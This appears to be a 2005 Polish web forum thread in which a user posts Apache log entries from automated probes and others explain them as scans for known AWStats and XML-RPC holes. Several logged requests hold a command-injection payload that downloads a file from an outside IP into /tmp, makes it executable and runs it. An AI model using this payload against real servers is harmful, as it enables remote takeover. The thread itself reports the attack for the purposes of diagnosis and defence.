dziwne logi

[curi0us]

Witam,

Pare razy dziennie z roznych ip ktos sie dobija do dziwnych katalogow:

129.59.47.61 - - [22/Dec/2005:23:16:45 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 2699 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:46 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 2699 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:47 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 2715 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:48 +0100] "POST /xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:49 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:50 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:52 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:53 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:54 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:55 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:56 +0100] "POST /xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:57 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

129.59.47.61 - - [22/Dec/2005:23:16:58 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Nie wiem o co chodzi, bo nie mam takich plikow, tak tylko sie ciekawie w jaki sposob to sie dzieje

[Mark05]

proste.. albo ktos skanuje IP w poszuikiwaniu serverow podatnych na w/w ataki ( bledy w znanych skryptach / oprogramowaniu ) albo ktos stara sie CIebie zaatakowac gotowa paczka sprawdzajaca podatnosc na *rozne* bledy

[michal]

Raczej to:

ktos skanuje IP w poszuikiwaniu serverow podatnych na w/w ataki ( bledy w znanych skryptach / oprogramowaniu )

Normalna sprawa, mam tego na wielu domenach masę.

[Gość w3master]

security hole in awstats: *https://www.totalchoicehosting.com/forums/lofiversion/index.php/t17086.html

secutity hole in xmlrpc: *https://news.netcraft.com/archives/2005/07/04/php_blogging_apps_vulnerable_to_xmlrpc_exploits.html and *https://phpxmlrpc.sourceforge.net/

kozystanie ze starych wersji bibliotek / programow jest jak jazda na rowerze bez trzymanki po wyboistej drodze - nie wiesz na ktorej dziurze wpadniesz.

[vegitaluk]

mi czeto wchodza na jakies pliki swf ktorych wogole nie ma i nigdy nie bylo